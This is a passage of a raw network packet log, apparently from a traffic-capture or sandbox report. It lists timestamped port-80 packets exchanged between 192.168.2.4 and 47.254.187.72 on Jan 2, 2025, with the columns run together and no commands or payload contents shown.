                                                                            Jan 2, 2025 20:34:58.229223967 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.229228973 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.229234934 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.229239941 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.229248047 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.229439974 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.229439974 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.238058090 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.238080025 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.238091946 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.238101959 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.238112926 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.238122940 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.238135099 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.238260031 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.238260031 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.240098953 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.240154982 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.240174055 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.240184069 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.240185976 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.240196943 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.240207911 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.240210056 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.240219116 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.240228891 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.240283966 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.240283966 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.240818024 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.240828037 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.240837097 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.240848064 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.240864038 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.240874052 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.240884066 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.240890026 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.240901947 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.240911007 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.240914106 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.240931988 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.241379976 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.241552114 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.241616964 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.241626978 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.241637945 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.241648912 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.241658926 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.241672993 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.241687059 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.241714001 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.241714001 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.241739988 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.241785049 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.258853912 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.258879900 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.258893013 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.258903027 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.258915901 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.258933067 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.258944035 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.258944035 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.258955002 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.258966923 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.258977890 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.258985043 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.258996964 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.259007931 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.259018898 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.259021044 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.259035110 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.259040117 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.259047031 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.259057045 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.259062052 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.259071112 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.259080887 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.259083986 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.259090900 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.259092093 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.259104013 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.259118080 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.259126902 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.259128094 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.259143114 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.259150982 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.259183884 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.259183884 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.259558916 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.259630919 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.259640932 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.259656906 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.259658098 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.259670019 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.259680033 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.259681940 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.259691954 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.259701967 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.259704113 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.259712934 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.259732962 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.259784937 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.265718937 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.265732050 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.265743017 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.265753984 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.265763998 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.265774965 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.265785933 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.265794992 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.267755985 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.268539906 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.268551111 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.268562078 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.268580914 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.268591881 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.268603086 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.268609047 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.268609047 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.268614054 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.268663883 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.268663883 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.275129080 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.275171041 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.275188923 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.275197983 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.275202990 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.275214911 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.275228977 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.275230885 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.275230885 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.275240898 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.275253057 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.275264025 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.275752068 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.277381897 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.277442932 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.277457952 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.277472019 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.277477026 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.277487993 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.277496099 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.277501106 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.277507067 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.277533054 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.278670073 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.282690048 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.282705069 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.282722950 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.282736063 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.282747030 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.282757998 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.282768965 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.282769918 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.282784939 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.282793999 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.282820940 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.283154964 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.304100990 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.304126978 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.304140091 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.304151058 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.304162979 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.304163933 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.304173946 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.304198027 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.304202080 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.304214001 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.304224968 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.304234982 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.304241896 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.304248095 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.304259062 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.304259062 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.304271936 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.304281950 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.304282904 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.304291010 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.304294109 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.304318905 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.307759047 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.315846920 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.315912008 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.315922976 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.315933943 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.315946102 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.315956116 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.315968037 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.315979004 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.316008091 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.319751978 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.324839115 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.324855089 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.324879885 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.324891090 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.324903011 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.324913979 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.324925900 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.324935913 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.324953079 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.324979067 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.324979067 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.327003956 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.327020884 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.327032089 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.327044010 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.327054977 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.327064037 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.327065945 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.327079058 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.327104092 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.327248096 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.327661037 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.327673912 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.327685118 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.327733994 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.327740908 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.327740908 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.327744961 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.327764034 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.327775955 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.327788115 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.327795029 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.327795029 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.327805996 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.327914953 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.328298092 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.328309059 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.328326941 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.328336954 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.328346968 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.328363895 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.328363895 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.328392029 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.328402996 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.328413963 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.328417063 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.328423023 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.328438044 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.328656912 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.345529079 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.345542908 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.345549107 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.345592976 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.345603943 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.345616102 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.345619917 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.345644951 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.345658064 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.345671892 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.345673084 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.345690012 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.345693111 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.345701933 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.345712900 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.345724106 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.345736980 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.345755100 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.345767021 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.345777988 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.345793009 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.345804930 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.345804930 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.345825911 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.345858097 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.345870018 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.345880985 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.345892906 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.345923901 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.346010923 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.346371889 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.346384048 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.346402884 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.346412897 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.346424103 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.346431017 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.346446991 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.346456051 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.346457958 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.346467972 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.346482992 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.346687078 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.353645086 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.353657007 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.353667974 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.353677988 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.353688955 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.353699923 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.353710890 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.353722095 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.353724003 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.353815079 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.356805086 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.356897116 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.356906891 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.356918097 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.356923103 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.356930017 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.356940031 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.356949091 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.356951952 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.356962919 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.357001066 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.357001066 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.361838102 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.361921072 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.361926079 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.361936092 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.361953974 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.361964941 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.361975908 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.361985922 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.361988068 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.361999989 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.362006903 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.362093925 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.364140987 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.364202023 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.364211082 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.364218950 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.364222050 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.364239931 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.364249945 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.364258051 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.364262104 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.364272118 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.364283085 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.364310980 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.364310980 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.369443893 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.369455099 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.369467020 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.369477034 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.369488001 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.369498014 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.369503975 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.369508982 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.369519949 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.369654894 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:58.390883923 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:58.390912056 CET804973047.254.187.72192.168.2.4
